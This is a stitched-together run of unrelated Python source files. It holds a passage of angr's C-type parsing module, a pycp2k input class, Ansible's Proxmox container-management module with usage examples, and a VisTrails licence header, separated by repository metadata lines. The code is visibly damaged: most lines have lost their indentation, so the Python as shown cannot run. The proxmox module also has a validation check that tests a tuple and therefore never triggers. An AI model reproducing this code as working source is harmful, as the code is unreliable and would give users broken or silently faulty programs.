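    # the int's 4-byte boundary, so offsets == {'a': 0, 'b': 4}.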
def extract(self, state, addr, concrete=False):
values = {}
for name, offset in self.offsets.items():
ty = self.fields[name]
v = SimMemView(ty=ty, addr=addr+offset, state=state)
if concrete:
values[name] = v.concrete
else:
values[name] = v.resolved
return SimStructValue(self, values=values)
def _with_arch(self, arch):
if arch.name in self._arch_memo:
return self._arch_memo[arch.name]
out = SimStruct(None, name=self.name, pack=self._pack, align=self._align)
out._arch = arch
self._arch_memo[arch.name] = out
out.fields = OrderedDict((k, v.with_arch(arch)) for k, v in self.fields.items())
return out
def __repr__(self):
return 'struct %s' % self.name
@property
def size(self):
return sum(val.size for val in self.fields.values())
@property
def alignment(self):
if self._align is not None:
return self._align
return max(val.alignment for val in self.fields.values())
def _refine_dir(self):
return list(self.fields.keys())
def _refine(self, view, k):
offset = self.offsets[k]
ty = self.fields[k]
return view._deeper(ty=ty, addr=view._addr + offset)
def store(self, state, addr, value):
if type(value) is dict:
pass
elif type(value) is SimStructValue:
value = value._values
else:
raise TypeError("Can't store struct of type %s" % type(value))
if len(value) != len(self.fields):
raise ValueError("Passed bad values for %s; expected %d, got %d" % (self, len(self.offsets), len(value)))
for field, offset in self.offsets.items():
ty = self.fields[field]
ty.store(state, addr + offset, value[field])
def _init_str(self):
return "%s([%s], name=\"%s\", pack=%s, align=%s)" % (
self.__class__.__name__,
", ".join([f._init_str() for f in self.fields]),
self._name,
self._pack,
self._align,
)
class SimStructValue:
"""
A SimStruct type paired with some real values
"""
def __init__(self, struct, values=None):
"""
:param struct: A SimStruct instance describing the type of this struct
:param values: A mapping from struct fields to values
"""
self._struct = struct
self._values = defaultdict(lambda: None, values or ())
def __repr__(self):
fields = ('.{} = {}'.format(name, self._values[name]) for name in self._struct.fields)
return '{{\n {}\n}}'.format(',\n '.join(fields))
def __getattr__(self, k):
return self[k]
def __getitem__(self, k):
        if type(k) is int:
            # an integer index selects the k-th field in declaration order
            k = list(self._struct.fields)[k]
        return self._values[k]
class SimUnion(SimType):
_fields = ('members', 'name')
def __init__(self, members, name=None, label=None):
"""
:param members: The members of the union, as a mapping name -> type
:param name: The name of the union
"""
super(SimUnion, self).__init__(label)
self._name = name if name is not None else '<anon>'
self.members = members
@property
def name(self):
return self._name
@property
def size(self):
return max(ty.size for ty in self.members.values())
@property
def alignment(self):
return max(val.alignment for val in self.members.values())
def __repr__(self):
# use the str instead of repr of each member to avoid exceed recursion
# depth when representing self-referential unions
return 'union %s {\n\t%s\n}' % (self.name, '\n\t'.join('%s %s;' % (name, str(ty)) for name, ty in self.members.items()))
def __str__(self):
return 'union %s' % (self.name, )
def _with_arch(self, arch):
        out = SimUnion({name: ty.with_arch(arch) for name, ty in self.members.items()}, self._name, self.label)
out._arch = arch
return out
BASIC_TYPES = {
'char': SimTypeChar(),
'signed char': SimTypeChar(),
'unsigned char': SimTypeChar(),
'short': SimTypeShort(True),
'signed short': SimTypeShort(True),
'unsigned short': SimTypeShort(False),
'short int': SimTypeShort(True),
'signed short int': SimTypeShort(True),
'unsigned short int': SimTypeShort(False),
'int': SimTypeInt(True),
'signed int': SimTypeInt(True),
'unsigned int': SimTypeInt(False),
'long': SimTypeLong(True),
'signed long': SimTypeLong(True),
'unsigned long': SimTypeLong(False),
'long int': SimTypeLong(True),
'signed long int': SimTypeLong(True),
'unsigned long int': SimTypeLong(False),
'long long': SimTypeLongLong(True),
'signed long long': SimTypeLongLong(True),
'unsigned long long': SimTypeLongLong(False),
'long long int': SimTypeLongLong(True),
'signed long long int': SimTypeLongLong(True),
'unsigned long long int': SimTypeLongLong(False),
'float': SimTypeFloat(),
'double': SimTypeDouble(),
'void': SimTypeBottom(),
}
ALL_TYPES = {
'int8_t': SimTypeNum(8, True),
'uint8_t': SimTypeNum(8, False),
'byte': SimTypeNum(8, False),
'int16_t': SimTypeNum(16, True),
'uint16_t': SimTypeNum(16, False),
'word': SimTypeNum(16, False),
'int32_t': SimTypeNum(32, True),
'uint32_t': SimTypeNum(32, False),
'dword': SimTypeNum(32, False),
'int64_t': SimTypeNum(64, True),
'uint64_t': SimTypeNum(64, False),
'qword': SimTypeNum(64, False),
'ptrdiff_t': SimTypeLong(True),
'size_t': SimTypeLength(False),
'ssize_t': SimTypeLength(True),
'ssize': SimTypeLength(False),
'uintptr_t': SimTypeLong(False),
'string': SimTypeString(),
'wstring': SimTypeWString(),
}
ALL_TYPES.update(BASIC_TYPES)
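# Illustrative lookups (grounded in the tables above): ALL_TYPES['uint32_t']
# is SimTypeNum(32, False), and ALL_TYPES['unsigned long'] comes from
# BASIC_TYPES as SimTypeLong(signed=False).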
# this is a hack, pending https://github.com/eliben/pycparser/issues/187
def make_preamble():
out = ['typedef int TOP;']
types_out = []
for ty in ALL_TYPES:
if ty in BASIC_TYPES:
continue
if ' ' in ty:
continue
typ = ALL_TYPES[ty]
if isinstance(typ, (SimTypeFunction, SimTypeString, SimTypeWString)):
continue
if isinstance(typ, (SimTypeNum, SimTypeInt)) and str(typ) not in BASIC_TYPES:
try:
# TODO: Investigate whether this needs to be re-imagined using byte_width
styp = {8: 'char', 16: 'short', 32: 'int', 64: 'long long'}[typ._size]
except KeyError:
styp = 'long' # :(
if not typ.signed:
styp = 'unsigned ' + styp
typ = styp
if isinstance(typ, (SimStruct,)):
types_out.append(str(typ))
out.append('typedef %s %s;' % (typ, ty))
types_out.append(ty)
return '\n'.join(out) + '\n', types_out
def _make_scope():
"""
Generate CParser scope_stack argument to parse method
"""
scope = dict()
for ty in ALL_TYPES:
if ty in BASIC_TYPES:
continue
if ' ' in ty:
continue
typ = ALL_TYPES[ty]
if isinstance(typ, (SimTypeFunction,SimTypeString, SimTypeWString)):
continue
scope[ty] = True
return [scope]
@deprecated(replacement="register_types(parse_type(struct_expr))")
def define_struct(defn):
"""
Register a struct definition globally
>>> define_struct('struct abcd {int x; int y;}')
"""
struct = parse_type(defn)
ALL_TYPES[struct.name] = struct
ALL_TYPES['struct ' + struct.name] = struct
return struct
def register_types(types):
"""
Pass in some types and they will be registered to the global type store.
The argument may be either a mapping from name to SimType, or a plain SimType.
The plain SimType must be either a struct or union type with a name present.
>>> register_types(parse_types("typedef int x; typedef float y;"))
>>> register_types(parse_type("struct abcd { int ab; float cd; }"))
"""
if type(types) is SimStruct:
if types.name == '<anon>':
raise ValueError("Cannot register anonymous struct")
ALL_TYPES['struct ' + types.name] = types
elif type(types) is SimUnion:
if types.name == '<anon>':
raise ValueError("Cannot register anonymous union")
ALL_TYPES['union ' + types.name] = types
else:
ALL_TYPES.update(types)
def do_preprocess(defn):
"""
Run a string through the C preprocessor that ships with pycparser but is weirdly inaccessible?
"""
from pycparser.ply import lex, cpp
lexer = lex.lex(cpp)
p = cpp.Preprocessor(lexer)
# p.add_path(dir) will add dir to the include search path
p.parse(defn)
return ''.join(tok.value for tok in p.parser if tok.type not in p.ignore)
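# Illustrative (a sketch): do_preprocess("#define N 4\nint arr[N];") expands
# the macro and returns, modulo whitespace, "int arr[4];".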
def parse_defns(defn, preprocess=True):
"""
Parse a series of C definitions, returns a mapping from variable name to variable type object
"""
return parse_file(defn, preprocess=preprocess)[0]
def parse_types(defn, preprocess=True):
"""
Parse a series of C definitions, returns a mapping from type name to type object
"""
return parse_file(defn, preprocess=preprocess)[1]
_include_re = re.compile(r'^\s*#include')
def parse_file(defn, preprocess=True):
"""
Parse a series of C definitions, returns a tuple of two type mappings, one for variable
definitions and one for type definitions.
"""
if pycparser is None:
raise ImportError("Please install pycparser in order to parse C definitions")
defn = '\n'.join(x for x in defn.split('\n') if _include_re.match(x) is None)
if preprocess:
defn = do_preprocess(defn)
preamble, ignoreme = make_preamble()
node = pycparser.c_parser.CParser().parse(preamble + defn)
if not isinstance(node, pycparser.c_ast.FileAST):
raise ValueError("Something went horribly wrong using pycparser")
out = {}
extra_types = {}
for piece in node.ext:
if isinstance(piece, pycparser.c_ast.FuncDef):
out[piece.decl.name] = _decl_to_type(piece.decl.type, extra_types)
elif isinstance(piece, pycparser.c_ast.Decl):
ty = _decl_to_type(piece.type, extra_types)
if piece.name is not None:
out[piece.name] = ty
elif isinstance(piece, pycparser.c_ast.Typedef):
extra_types[piece.name] = _decl_to_type(piece.type, extra_types)
for ty in ignoreme:
del extra_types[ty]
return out, extra_types
def parse_type(defn, preprocess=True):
"""
Parse a simple type expression into a SimType
>>> parse_type('int *')
"""
if pycparser is None:
raise ImportError("Please install pycparser in order to parse C definitions")
defn = re.sub(r"/\*.*?\*/", r"", defn)
parser = pycparser.CParser()
parser.cparser = pycparser.ply.yacc.yacc(module=parser,
start='parameter_declaration',
debug=False,
optimize=False,
errorlog=errorlog)
node = parser.parse(text=defn, scope_stack=_make_scope())
if not isinstance(node, pycparser.c_ast.Typename) and \
not isinstance(node, pycparser.c_ast.Decl):
raise ValueError("Something went horribly wrong using pycparser")
decl = node.type
return _decl_to_type(decl)
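# Illustrative round trips (a sketch): parse_type('unsigned int *') yields a
# SimTypePointer wrapping SimTypeInt(signed=False), and parse_type('char [16]')
# yields SimTypeFixedSizeArray(SimTypeChar(), 16).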
def _accepts_scope_stack():
"""
pycparser hack to include scope_stack as parameter in CParser parse method
"""
def parse(self, text, scope_stack=None, filename='', debuglevel=0):
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()] if scope_stack is None else scope_stack
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
setattr(pycparser.CParser, 'parse', parse)
def _decl_to_type(decl, extra_types=None):
if extra_types is None: extra_types = {}
if isinstance(decl, pycparser.c_ast.FuncDecl):
argtyps = () if decl.args is None else [_decl_to_type(x.type, extra_types) for x in decl.args.params]
arg_names = [ arg.name for arg in decl.args.params] if decl.args else None
return SimTypeFunction(argtyps, _decl_to_type(decl.type, extra_types), arg_names=arg_names)
elif isinstance(decl, pycparser.c_ast.TypeDecl):
if decl.declname == 'TOP':
return SimTypeTop()
return _decl_to_type(decl.type, extra_types)
elif isinstance(decl, pycparser.c_ast.PtrDecl):
pts_to = _decl_to_type(decl.type, extra_types)
return SimTypePointer(pts_to)
elif isinstance(decl, pycparser.c_ast.ArrayDecl):
elem_type = _decl_to_type(decl.type, extra_types)
try:
size = _parse_const(decl.dim)
except ValueError as e:
l.warning("Got error parsing array dimension, defaulting to zero: %s", e)
size = 0
return SimTypeFixedSizeArray(elem_type, size)
elif isinstance(decl, pycparser.c_ast.Struct):
if decl.decls is not None:
fields = OrderedDict((field.name, _decl_to_type(field.type, extra_types)) for field in decl.decls)
else:
fields = OrderedDict()
if decl.name is not None:
key = 'struct ' + decl.name
if key in extra_types:
struct = extra_types[key]
elif key in ALL_TYPES:
struct = ALL_TYPES[key]
else:
struct = None
if struct is None:
struct = SimStruct(fields, decl.name)
elif not struct.fields:
struct.fields = fields
elif fields and struct.fields != fields:
raise ValueError("Redefining body of " + key)
extra_types[key] = struct
else:
struct = SimStruct(fields)
return struct
elif isinstance(decl, pycparser.c_ast.Union):
if decl.decls is not None:
fields = {field.name: _decl_to_type(field.type, extra_types) for field in decl.decls}
else:
fields = {}
if decl.name is not None:
key = 'union ' + decl.name
if key in extra_types:
union = extra_types[key]
elif key in ALL_TYPES:
union = ALL_TYPES[key]
else:
union = None
if union is None:
union = SimUnion(fields, decl.name)
elif not union.members:
union.members = fields
elif fields and union.members != fields:
raise ValueError("Redefining body of " + key)
extra_types[key] = union
else:
union = SimUnion(fields)
return union
elif isinstance(decl, pycparser.c_ast.IdentifierType):
key = ' '.join(decl.names)
if key in extra_types:
return extra_types[key]
elif key in ALL_TYPES:
return ALL_TYPES[key]
else:
            raise TypeError("Unknown type '%s'" % key)
raise ValueError("Unknown type!")
def _parse_const(c):
if type(c) is pycparser.c_ast.Constant:
return int(c.value)
elif type(c) is pycparser.c_ast.BinaryOp:
if c.op == '+':
return _parse_const(c.children()[0][1]) + _parse_const(c.children()[1][1])
if c.op == '-':
return _parse_const(c.children()[0][1]) - _parse_const(c.children()[1][1])
if c.op == '*':
return _parse_const(c.children()[0][1]) * _parse_const(c.children()[1][1])
if c.op == '/':
return _parse_const(c.children()[0][1]) // _parse_const(c.children()[1][1])
raise ValueError('Binary op %s' % c.op)
else:
raise ValueError(c)
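# Illustrative note (not from the original source): _parse_const folds constant
# integer expressions in array bounds, so a declaration such as
#
#   char buf[4 * 2 + 1];
#
# parses to a SimTypeFixedSizeArray of length 9.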
if pycparser is not None:
_accepts_scope_stack()
try:
register_types(parse_types("""
typedef long time_t;
struct timespec {
time_t tv_sec;
long tv_nsec;
};
struct timeval {
time_t tv_sec;
long tv_usec;
};
"""))
except ImportError:
pass
from .state_plugins.view import SimMemView
| iamahuman/angr | angr/sim_type.py | Python | bsd-2-clause | 38,799 |
from pycp2k.inputsection import InputSection
class _point65(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Type = None
self.Atoms = []
self.Weights = []
self.Xyz = None
self._name = "POINT"
self._keywords = {'Xyz': 'XYZ', 'Type': 'TYPE'}
self._repeated_keywords = {'Atoms': 'ATOMS', 'Weights': 'WEIGHTS'}
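# Illustrative usage (not from the original source; the values shown are
# hypothetical):
#
#   point = _point65()
#   point.Type = "GEO_CENTER"
#   point.Atoms.append("1 2 3")   # ATOMS is a repeatable keyword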
| SINGROUP/pycp2k | pycp2k/classes/_point65.py | Python | lgpl-3.0 | 397 |
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: proxmox
short_description: management of instances in Proxmox VE cluster
description:
- allows you to create/delete/stop instances in Proxmox VE cluster
- Starting in Ansible 2.1, it automatically detects containerization type (lxc for PVE 4, openvz for older)
version_added: "2.0"
options:
api_host:
description:
- the host of the Proxmox VE cluster
required: true
api_user:
description:
- the user to authenticate with
required: true
api_password:
description:
- the password to authenticate with
      - you can use the PROXMOX_PASSWORD environment variable
default: null
required: false
vmid:
description:
- the instance id
default: null
required: true
validate_certs:
description:
- enable / disable https certificate verification
default: false
required: false
type: boolean
node:
description:
      - Proxmox VE node on which the new VM will be created
      - required only for C(state=present)
      - for other states it will be autodiscovered
default: null
required: false
password:
description:
- the instance root password
- required only for C(state=present)
default: null
required: false
hostname:
description:
- the instance hostname
- required only for C(state=present)
default: null
required: false
ostemplate:
description:
      - the template used for VM creation
- required only for C(state=present)
default: null
required: false
disk:
description:
- hard disk size in GB for instance
default: 3
required: false
cpus:
description:
      - number of CPUs allocated to the instance
default: 1
required: false
memory:
description:
- memory size in MB for instance
default: 512
required: false
swap:
description:
- swap memory size in MB for instance
default: 0
required: false
netif:
description:
- specifies network interfaces for the container
default: null
required: false
type: A hash/dictionary defining interfaces
mounts:
description:
- specifies additional mounts (separate disks) for the container
default: null
required: false
type: A hash/dictionary defining mount points
version_added: "2.2"
ip_address:
description:
- specifies the address the container will be assigned
default: null
required: false
type: string
onboot:
description:
- specifies whether a VM will be started during system bootup
default: false
required: false
type: boolean
storage:
description:
- target storage
default: 'local'
required: false
type: string
cpuunits:
description:
- CPU weight for a VM
default: 1000
required: false
type: integer
nameserver:
description:
- sets DNS server IP address for a container
default: null
required: false
type: string
searchdomain:
description:
- sets DNS search domain for a container
default: null
required: false
type: string
timeout:
description:
- timeout for operations
default: 30
required: false
type: integer
force:
description:
      - forcing operations
      - can be used only with states C(present), C(stopped), C(restarted)
      - with C(state=present) the force option allows overwriting an existing container
      - with states C(stopped), C(restarted) it allows force-stopping the instance
default: false
required: false
type: boolean
state:
description:
- Indicate desired state of the instance
choices: ['present', 'started', 'absent', 'stopped', 'restarted']
default: present
notes:
  - Requires proxmoxer and requests modules on host. These modules can be installed with pip.
requirements: [ "proxmoxer", "python >= 2.7", "requests" ]
author: "Sergei Antipov @UnderGreen"
'''
EXAMPLES = '''
# Create new container with minimal options
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz'
# Create new container with minimal options with force(it will rewrite existing container)
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' force=yes
# Create new container with minimal options use environment PROXMOX_PASSWORD variable(you should export it before)
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz'
# Create new container with minimal options defining network interface with dhcp
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' netif='{"net0":"name=eth0,ip=dhcp,ip6=dhcp,bridge=vmbr0"}'
# Create new container with minimal options defining network interface with static ip
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' netif='{"net0":"name=eth0,gw=192.168.0.1,ip=192.168.0.2/24,bridge=vmbr0"}'
# Create new container with minimal options defining a mount
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' mounts='{"mp0":"local:8,mp=/mnt/test/"}'
# Start container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=started
# Stop container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=stopped
# Stop container with force
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' force=yes state=stopped
# Restart container (you can't restart a stopped or mounted container)
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=restarted
# Remove container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=absent
'''
import os
import time
try:
from proxmoxer import ProxmoxAPI
HAS_PROXMOXER = True
except ImportError:
HAS_PROXMOXER = False
VZ_TYPE=None
def get_instance(proxmox, vmid):
return [ vm for vm in proxmox.cluster.resources.get(type='vm') if vm['vmid'] == int(vmid) ]
def content_check(proxmox, node, ostemplate, template_store):
return [ True for cnt in proxmox.nodes(node).storage(template_store).content.get() if cnt['volid'] == ostemplate ]
def node_check(proxmox, node):
return [ True for nd in proxmox.nodes.get() if nd['node'] == node ]
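# The helpers above return (possibly empty) lists; callers rely on the
# truthiness of a non-empty list to mean "found".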
def create_instance(module, proxmox, vmid, node, disk, storage, cpus, memory, swap, timeout, **kwargs):
proxmox_node = proxmox.nodes(node)
kwargs = dict((k,v) for k, v in kwargs.iteritems() if v is not None)
if VZ_TYPE =='lxc':
kwargs['cpulimit']=cpus
kwargs['rootfs']=disk
if 'netif' in kwargs:
kwargs.update(kwargs['netif'])
del kwargs['netif']
if 'mounts' in kwargs:
kwargs.update(kwargs['mounts'])
del kwargs['mounts']
else:
kwargs['cpus']=cpus
kwargs['disk']=disk
taskid = getattr(proxmox_node, VZ_TYPE).create(vmid=vmid, storage=storage, memory=memory, swap=swap, **kwargs)
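    # Poll the task until Proxmox reports it stopped with exit status OK,
    # decrementing the timeout roughly once per second.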
while timeout:
if ( proxmox_node.tasks(taskid).status.get()['status'] == 'stopped'
and proxmox_node.tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for creating VM. Last line in task before timeout: %s'
% proxmox_node.tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def start_instance(module, proxmox, vm, vmid, timeout):
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.start.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for starting VM. Last line in task before timeout: %s'
% proxmox.nodes(vm[0]['node']).tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def stop_instance(module, proxmox, vm, vmid, timeout, force):
if force:
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.shutdown.post(forceStop=1)
else:
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.shutdown.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
            module.fail_json(msg='Reached timeout while waiting for stopping VM. Last line in task before timeout: %s'
                             % proxmox.nodes(vm[0]['node']).tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def umount_instance(module, proxmox, vm, vmid, timeout):
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.umount.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
            module.fail_json(msg='Reached timeout while waiting for unmounting VM. Last line in task before timeout: %s'
                             % proxmox.nodes(vm[0]['node']).tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def main():
module = AnsibleModule(
argument_spec = dict(
api_host = dict(required=True),
api_user = dict(required=True),
api_password = dict(no_log=True),
vmid = dict(required=True),
validate_certs = dict(type='bool', default='no'),
node = dict(),
password = dict(no_log=True),
hostname = dict(),
ostemplate = dict(),
disk = dict(type='str', default='3'),
cpus = dict(type='int', default=1),
memory = dict(type='int', default=512),
swap = dict(type='int', default=0),
netif = dict(type='dict'),
mounts = dict(type='dict'),
ip_address = dict(),
onboot = dict(type='bool', default='no'),
storage = dict(default='local'),
cpuunits = dict(type='int', default=1000),
nameserver = dict(),
searchdomain = dict(),
timeout = dict(type='int', default=30),
force = dict(type='bool', default='no'),
state = dict(default='present', choices=['present', 'absent', 'stopped', 'started', 'restarted']),
)
)
if not HAS_PROXMOXER:
module.fail_json(msg='proxmoxer required for this module')
state = module.params['state']
api_user = module.params['api_user']
api_host = module.params['api_host']
api_password = module.params['api_password']
vmid = module.params['vmid']
validate_certs = module.params['validate_certs']
node = module.params['node']
disk = module.params['disk']
cpus = module.params['cpus']
memory = module.params['memory']
swap = module.params['swap']
storage = module.params['storage']
if module.params['ostemplate'] is not None:
template_store = module.params['ostemplate'].split(":")[0]
timeout = module.params['timeout']
# If password not set get it from PROXMOX_PASSWORD env
if not api_password:
try:
api_password = os.environ['PROXMOX_PASSWORD']
        except KeyError:
            module.fail_json(msg='You should set the api_password param or use the PROXMOX_PASSWORD environment variable')
try:
proxmox = ProxmoxAPI(api_host, user=api_user, password=api_password, verify_ssl=validate_certs)
global VZ_TYPE
VZ_TYPE = 'openvz' if float(proxmox.version.get()['version']) < 4.0 else 'lxc'
except Exception as e:
module.fail_json(msg='authorization on proxmox cluster failed with exception: %s' % e)
if state == 'present':
try:
if get_instance(proxmox, vmid) and not module.params['force']:
module.exit_json(changed=False, msg="VM with vmid = %s is already exists" % vmid)
elif not (node, module.params['hostname'] and module.params['password'] and module.params['ostemplate']):
module.fail_json(msg='node, hostname, password and ostemplate are mandatory for creating vm')
elif not node_check(proxmox, node):
module.fail_json(msg="node '%s' not exists in cluster" % node)
elif not content_check(proxmox, node, module.params['ostemplate'], template_store):
module.fail_json(msg="ostemplate '%s' not exists on node %s and storage %s"
% (module.params['ostemplate'], node, template_store))
create_instance(module, proxmox, vmid, node, disk, storage, cpus, memory, swap, timeout,
password = module.params['password'],
hostname = module.params['hostname'],
ostemplate = module.params['ostemplate'],
netif = module.params['netif'],
mounts = module.params['mounts'],
ip_address = module.params['ip_address'],
onboot = int(module.params['onboot']),
cpuunits = module.params['cpuunits'],
nameserver = module.params['nameserver'],
searchdomain = module.params['searchdomain'],
force = int(module.params['force']))
module.exit_json(changed=True, msg="deployed VM %s from template %s" % (vmid, module.params['ostemplate']))
except Exception as e:
module.fail_json(msg="creation of %s VM %s failed with exception: %s" % ( VZ_TYPE, vmid, e ))
elif state == 'started':
try:
vm = get_instance(proxmox, vmid)
if not vm:
                module.fail_json(msg='VM with vmid = %s does not exist in cluster' % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'running':
module.exit_json(changed=False, msg="VM %s is already running" % vmid)
if start_instance(module, proxmox, vm, vmid, timeout):
module.exit_json(changed=True, msg="VM %s started" % vmid)
except Exception as e:
module.fail_json(msg="starting of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'stopped':
try:
vm = get_instance(proxmox, vmid)
if not vm:
                module.fail_json(msg='VM with vmid = %s does not exist in cluster' % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted':
if module.params['force']:
if umount_instance(module, proxmox, vm, vmid, timeout):
module.exit_json(changed=True, msg="VM %s is shutting down" % vmid)
else:
module.exit_json(changed=False, msg=("VM %s is already shutdown, but mounted. "
"You can use force option to umount it.") % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'stopped':
module.exit_json(changed=False, msg="VM %s is already shutdown" % vmid)
if stop_instance(module, proxmox, vm, vmid, timeout, force = module.params['force']):
module.exit_json(changed=True, msg="VM %s is shutting down" % vmid)
except Exception as e:
module.fail_json(msg="stopping of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'restarted':
try:
vm = get_instance(proxmox, vmid)
if not vm:
                module.fail_json(msg='VM with vmid = %s does not exist in cluster' % vmid)
if ( getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'stopped'
or getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted' ):
module.exit_json(changed=False, msg="VM %s is not running" % vmid)
if ( stop_instance(module, proxmox, vm, vmid, timeout, force = module.params['force']) and
start_instance(module, proxmox, vm, vmid, timeout) ):
module.exit_json(changed=True, msg="VM %s is restarted" % vmid)
except Exception as e:
module.fail_json(msg="restarting of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'absent':
try:
vm = get_instance(proxmox, vmid)
if not vm:
module.exit_json(changed=False, msg="VM %s does not exist" % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'running':
module.exit_json(changed=False, msg="VM %s is running. Stop it before deletion." % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted':
module.exit_json(changed=False, msg="VM %s is mounted. Stop it with force option before deletion." % vmid)
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE).delete(vmid)
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
module.exit_json(changed=True, msg="VM %s removed" % vmid)
timeout = timeout - 1
if timeout == 0:
                    module.fail_json(msg='Reached timeout while waiting for removing VM. Last line in task before timeout: %s'
                                     % proxmox.nodes(vm[0]['node']).tasks(taskid).log.get()[:1])
time.sleep(1)
except Exception as e:
module.fail_json(msg="deletion of VM %s failed with exception: %s" % ( vmid, e ))
# import module snippets
from ansible.module_utils.basic import *
main()
| Jmainguy/ansible-modules-extras | cloud/misc/proxmox.py | Python | gpl-3.0 | 18,785 |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from PyQt4 import QtGui, QtCore
import core.system
